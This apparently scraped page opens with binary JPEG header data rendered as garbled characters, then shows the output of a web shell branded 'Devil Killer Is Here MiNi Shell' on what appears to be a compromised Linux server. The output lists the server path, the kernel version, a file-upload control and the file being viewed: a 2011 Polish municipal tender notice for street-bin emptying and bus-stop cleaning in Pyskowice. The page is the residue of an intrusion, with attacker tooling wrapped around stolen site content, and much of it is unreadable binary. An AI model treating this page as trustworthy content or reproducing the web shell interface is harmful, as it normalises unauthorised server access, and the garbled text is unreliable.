JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111129/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111129/311965-N-2011.html

<p class="kh_header"><b>Pyskowice: Część I - Opróżnianie ulicznych koszy na odpady na terenie Gminy Pyskowice
Część II - Zimowe i letnie oczyszczanie przystanków autobusowych na terenie Gminy Pyskowice</b><br>
<b>Numer ogłoszenia: 311965 - 2011; data zamieszczenia: 29.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Pyskowice , ul. Strzelców Bytomskich 3, 44-120 Pyskowice, woj. śląskie, tel. 32 3326000, faks 32 3326002.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.pyskowice.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Część I - Opróżnianie ulicznych koszy na odpady na terenie Gminy Pyskowice
Część II - Zimowe i letnie oczyszczanie przystanków autobusowych na terenie Gminy Pyskowice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> CZĘŚĆ  1.  Opróżnianie  ulicznych  koszy  na  odpady  na  terenie  Gminy  Pyskowice

Zakres  prac  obejmuje:
Wykonawca  opróżniał  będzie  kosze  uliczne  z  odpadów  o  kodzie  20 03 01  (niesegregowane,  zmieszane  odpady  komunalne),  20 03 03  (odpady  z  czyszczenia  ulic  i  placów),  20 02 01  (odpady  ulegające  biodegradacji),  20 02 03  (inne  odpady  nieulegające  biodegradacji),   posadowionych  zgodnie  z  załącznikiem  nr  7  do  SIWZ.  Przy  opróżnianiu  koszy  żółto - czerwonych  oraz  koszy  na  psie  odchody  należy  stosować  wymienne  worki  o  odpowiedniej  pojemności.
CZĘŚĆ  2.  Zimowe  i  letnie  oczyszczanie  przystanków  autobusowych  na  terenie  Gminy  Pyskowice

Zakres  prac  obejmuje  całoroczne  utrzymanie  czystości  na  przystankach  autobusowych:
1.W  okresie  letnim  (oraz  w  okresie  zimowym  kiedy  nie  będzie  zalegał  śnieg):
utrzymanie  czystości  i  porządku  na  przystankach  autobusowych  na  terenie  Gminy  Pyskowice  (zgodnie  z  załącznikiem  nr  8). 
2. W okresie zimowym od 01.01.2012r. do 15.04.2012r.:zimowe  oczyszczanie  przystanków  autobusowych  (zgodnie  z  załącznikiem  nr  8)  tj.  odśnieżanie  ich,  likwidacja  gołoledzi,  śliskości  pośniegowej  i  polodowej  oraz  posypywanie  ich  nawierzchni  piaskiem  lub  solą,  usuwanie  błota  pośniegowego.

W  pierwszej  kolejności  letniemu  i  zimowemu  utrzymaniu  podlegają  przystanki  w  centrum  miasta  (oznaczone  w  załączniki  nr  8  gwiazdką).

Zamawiający  dopuszcza  składanie  ofert  częściowych  na  poszczególne  zadania  dlatego  OFERTY  NALEŻY  SKŁADAĆ  NA  KAŻDE  ZADANIE  ODDZIELNIE.  Każdy  z  Wykonawców  może  złożyć  ofertę  na  jedno  lub  dwa  zadania..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1.Zamawiający  przewiduje  udzielenia  zamówienia  uzupełniającego  określonego  w  art.  67  ust.  1  pkt  6  Ustawy  Prawo  Zamówień  Publicznych,  jeżeli  zaistnieje  konieczność  wykonania  prac,  tego  samego  rodzaju  jak  usługi  objęte  zamówieniem  podstawowym  w  wysokości  do  50%.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.51.32.00-8, 90.62.00.00-9, 90.60.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegający się o zamówienie musi mieć odpowiednie uprawnienia do wykonywania określonej działalności lub czynności dlatego musi mieć dla 
CZĘŚĆ  1.  Opróżnianie  ulicznych  koszy  na  odpady  na  terenie  Gminy  Pyskowice
a)Oferent  musi  posiadać  zezwolenie  na  prowadzenie  działalności  w  zakresie  zbierania  i  transportu  odpadów  o  kodach:  20 03 01,  20 03 03,  20 02 01,  20 02 03  wydane  na  podstawie  ustawy  z  dnia  27.04.2001r. o odpadach  (t.j.  Dz.  U.  z  2007r,  nr  39,  poz.  251  z  póź.  zm.),
b)Oferent  musi  posiadać  zezwolenie  na  odbieranie  odpadów  o  kodach  20 03 01,  20 03 03,  20 02 01,  20 02 03  wydane  na  podstawie  ustawy  z  dnia  13.09.1996r.  o  utrzymaniu  czystości  i  porządku  w  gminach  (t.j.  Dz.  U.  z  2005r.,  nr  236,  poz.  2008  z  póź.  zm.),

CZĘŚĆ  2.  Zimowe  i  letnie  oczyszczanie  przystanków  autobusowych  na  terenie  Gminy  Pyskowice
a)Oferent  musi  posiadać  zezwolenie  na  prowadzenie  działalności  w  zakresie  zbierania  i  transportu  odpadów  o  kodach:  20 03 01  (niesegregowane,  zmieszane  odpady  komunalne),  20 03 03  (odpady  z  czyszczenia  ulic  i  placów),  20 02 01  (odpady  ulegające  biodegradacji),  20 02 03  (inne  odpady  nieulegające  biodegradacji)  wydane  na  podstawie  ustawy  z  dnia  27.04.2001r. o odpadach  (t.j.  Dz.  U.  z  2007r,  nr  39,  poz.  251  z  póź.  zm.).


Warunek udziału w postępowaniu będzie oceniany na
podstawie dokumentów i oświadczeń wymienionych w punkcie 7 SIWZ i pkt. III.4.1.) niniejszego ogłoszenia wg formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegający się o zamówienie musi posiadać odpowiednią wiedzę i doświadczenie. W tym
celu musi mieć wykonane w ciągu ostatnich trzech lat dla CZĘŚCI 1 przynajmniej 1 usługę,  a  w  przypadku  świadczeń  okresowych  lub  ciągłych  wykonywać  jedną  usługę  w  zakresie  niezbędnym  do  wykazania  spełnienia  warunków  wiedzy  i  doświadczenia  o  wartości  nie  mniejszej  niż  50.000,00 zł  brutto, dla CZĘŚCI 2
przynajmniej 1 usługę,  a  w  przypadku  świadczeń  okresowych  lub  ciągłych  wykonywać  jedną  usługę  w  zakresie  niezbędnym  do  wykazania  spełnienia  warunków  wiedzy  i  doświadczenia  o  wartości  nie  mniejszej  niż  40.000,00 zł  brutto.

Warunek udziału w postępowaniu będzie oceniany na
podstawie dokumentów i oświadczeń wymienionych w punkcie 7 SIWZ i pkt. III.4.1.) niniejszego
ogłoszenia wg formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o  zamówienie  mogą  ubiegać  się  Wykonawcy,  których  potencjał  techniczny  pozwoli  na  prawidłowe  wykonanie  zamówienia.

Warunek udziału w postępowaniu będzie oceniany na
podstawie oświadczenia art. 22 ust. 1 wymienionego w punkcie 7 SIWZ i pkt. III.4.1.) niniejszego ogłoszenia wg formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegający się o zamówienie musi być w sytuacji ekonomiczne i finansowej pozwalającej
mu na realizacje zamówienia. W tym celu musi posiadać opłaconą polisę  ubezpieczeniową,  a  w  przypadku  jej  braku  inny  dokument  potwierdzający,  że  Wykonawca  jest  ubezpieczony  od  odpowiedzialności  cywilnej  w  zakresie  prowadzonej  działalności  związanej  z  przedmiotem  zamówienia  na  kwotę  min.  40.000,00  zł.

Warunek udziału w postępowaniu będzie oceniany na
podstawie dokumentów i oświadczeń wymienionych w punkcie 7 SIWZ i pkt. III.4.1.) niniejszego ogłoszenia wg formuły spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Pełnomocnictwo w przypadku podmiotów występujących wspólnie (dot. również spółek cywilnych). 2. Jeżeli
Wykonawca wykazuje spełnienie warunków udziału w postępowaniu, polega na zasobach innych podmiotów,
winien załączyć pisemne zobowiązanie tych podmiotów do oddania mu niezbędnych zasobów na okres korzystania
z nich przy wykonywaniu przedmiotowego zamówienia. 3. Dokumenty sporządzone w języku obcym muszą być
złożone wraz z tłumaczeniami na język polski. 4.Dokumenty przedłożone w formie kopii winny być potwierdzone
wraz z pieczątką imienną za zgodność z oryginałem przez uprawnionego przedstawiciela wykonawcy. Uprawnienie
do podpisywania powinno być dołączone, o ile nie wynika to z innych dokumentów. UWAGA! na ofertę
WYKONAWCY składać się musi wypełniony druk oferty wg zał. nr 1 do SIWZ oraz formularz cenowy na
podstawie, którego należy obliczyć cenę oferty wg zał. nr 2a lub 2b do SIWZ. Do oferty należy dołączyć dokumenty i
oświadczenia o których mowa w punkcie VII SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Postanowienia umowy zawarte są w zał. nr 6 a i b do SIWZ - wzór umowy.
1.Zamawiający przewidział możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty.
2.Zmiany  umowy  wymagają  aneksu  pod  rygorem  nieważności  z  zastrzeżeniem  pkt. b:
a)Zamawiający  przewiduje  istotne  zmiany  postanowień  umowy  w  przypadku  zmiany  przepisów  prawa,  które  mogą  mieć  wpływ  na  realizację  zamówienia.
b)Zmiana  osoby  uprawnionej  do  realizacji  umowy  zarówno  ze  strony  Zamawiającego  jak  i  Wykonawcy  następuje  po  pisemnym  poinformowaniu  drugiej  Strony  i  nie  wymaga  aneksu  do  umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.pyskowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Pyskowicach,
ul. Strzelców Bytomskich 3, 44-120 PYSKOWICE, pok 310.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.12.2011 godzina 10:30, miejsce: Urząd Miejski w Pyskowicach, ul. Strzelców Bytomskich 3, 44-120 PYSKOWICE w
Biurze Obsługi Interesanta pok. 107 /parter/.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opróżnianie  ulicznych  koszy  na  odpady  na  terenie  Gminy  Pyskowice.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres  prac  obejmuje:
Wykonawca  opróżniał  będzie  kosze  uliczne  z  odpadów  o  kodzie  20 03 01  (niesegregowane,  zmieszane  odpady  komunalne),  20 03 03  (odpady  z  czyszczenia  ulic  i  placów),  20 02 01  (odpady  ulegające  biodegradacji),  20 02 03  (inne  odpady  nieulegające  biodegradacji),   posadowionych  zgodnie  z  załącznikiem  nr  7  do  SIWZ.  Przy  opróżnianiu  koszy  żółto - czerwonych  oraz  koszy  na  psie  odchody  należy  stosować  wymienne  worki  o  odpowiedniej  pojemności.
Wykonawca  zobowiązany  jest  do  wykonywania  prac  zgodnie  z  ustalonym  harmonogramem  (załącznik  nr  7)  lub  dodatkowo  na  telefoniczne  zgłoszenie  Zamawiającego  poza  ustalonym  harmonogramem.
Zamawiający  zastrzega  sobie  prawo  do  wezwania  Wykonawcy  do  wywozu  nieczystości  w  dni  ustawowo  wolne  od  pracy,  w  tym  niedziele  i  święta.  Wymagany  czas  reakcji  3  godziny  na  zgłoszenie  dokonane  w  godz.  od  800 - 1600.
W  przypadku  ustawienia,  w  czasie  trwania  umowy,  dodatkowych  koszy  na  nowych  lokalizacjach  (przewidywana  ilość  około  40  sztuk)  Zamawiający  wskaże  częstotliwość  ich  opróżniania.  
W  przypadku  dodatkowych  wywozów,  wynagrodzenie  miesięczne  Wykonawcy  zostanie  adekwatnie  zwiększone.
Poprzez  opróżnianie  kosza  należy  rozumieć:  usunięcie  odpadów  z  wnętrza  kosza  oraz  z  terenu  znajdującego  się  wokół  kosza  tj.  w  promieniu  2  metrów  od  kosza.  W  sytuacji  gdy  kosz  zostanie  przekrzywiony  do  obowiązków  Wykonawcy  należy  ustawienie  go  w  prawidłowej  pozycji.  Ponadto  Wykonawca  ma  obowiązek  powiadomić  Zamawiającego  o  kradzieży  lub  zdewastowanym  koszu.  Fakt  ten  powinien  być  zgłoszony,  w  tym  samym  dniu,  w  którym  zgodnie  z  harmonogramem  realizowano  zadanie.

Kosze  będą  opróżniane  zgodnie  z  załącznikiem  nr  7  do  SIWZ,  przy  założeniu,  że  kosze  przy  lokalizacji  z  symbolem  *  opróżniane  będą  w  pierwszej  kolejności  tj  w  godz.  600 - 800,  zaś  pozostałe  w  godz.  900 - 1100.
Cena  ofertowa  powinna  uwzględniać  tzw.  gotowość  do  ciągłego  świadczenia  usługi  przez  Wykonawcę.
Zamawiający  przeprowadzał  będzie  wyrywkowe  kontrole  realizacji  usługi.
W  razie  stwierdzenia,  że  usługa  nie  została  wykonana  należycie  tj.  występują  wady  w  wykonaniu  przedmiotu  umowy  (kosz  nie  został  opróżniony,  wokół  kosza  w  promieniu  2  metrów  zalegają  odpady),  Zamawiający  poinformuje  telefonicznie  Wykonawcę  o  występujących  nieprawidłowościach,  na  potwierdzenie  czego  zostanie  sporządzona  notatka  służbowa  oraz  dokumentacja  zdjęciowa.  Wykonawca  zostanie  każdorazowo  obciążony  karą  o  której  mowa  w  umowie  stanowiącej  załącznik  do  niniejszej  specyfikacji.
Wykonawca  od  momentu  odbioru  odpadów  ponosi  wszelką  odpowiedzialność  za  ich  magazynowanie - przechowywanie  oraz  ponosi  opłaty  na  rzecz  ochrony  środowiska  zgodnie  z  ustawą  o  odpadach  i  innych  obowiązujących  przepisów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.32.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zimowe  i  letnie  oczyszczanie  przystanków  autobusowych  na  terenie  Gminy  Pyskowice.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres  prac  obejmuje  całoroczne  utrzymanie  czystości  na  przystankach  autobusowych:
1.W  okresie  letnim  (oraz  w  okresie  zimowym  kiedy  nie  będzie  zalegał  śnieg):
utrzymanie  czystości  i  porządku  na  przystankach  autobusowych  na  terenie  Gminy  Pyskowice  (zgodnie  z  załącznikiem  nr  8)  w  obrębie  2m  wokół  wiaty  przystankowej  oraz  na  przystankach  na  żądanie,  w  tym:  omiatanie,  usuwanie  trawy  wyrastającej  w  obrębie  przystanku  oraz  koszenie,  zbieranie  nieczystości.
2.W  okresie  zimowym  od  01.01.2012r.  do  15.04.2012r.:
zimowe  oczyszczanie  przystanków  autobusowych  (zgodnie  z  załącznikiem  nr  8)  tj.  odśnieżanie  ich,  likwidacja  gołoledzi,  śliskości  pośniegowej  i  polodowej  oraz  posypywanie  ich  nawierzchni  piaskiem  lub  solą,  usuwanie  błota  pośniegowego.
W  przypadku  zimowego  utrzymania  Wykonawca  powinien  pozostać  w  ciągłej  gotowości  do  realizacji  usługi,  tzn.  rozpocząć  jej  realizację  bez  wcześniejszego  wezwania  ze  strony  Zamawiającego.  Usługa  winna  być  realizowana  codziennie,  również  w  dniach  ustawowo  wolnych  od  pracy,  w  szczególności  w  przypadku  wystąpienia  opadów  śniegu.
Wykonawca zadania we własnym zakresie przygotowuje, gromadzi oraz przechowuje  materiały  do  zimowego  utrzymania  przystanków..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.60.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
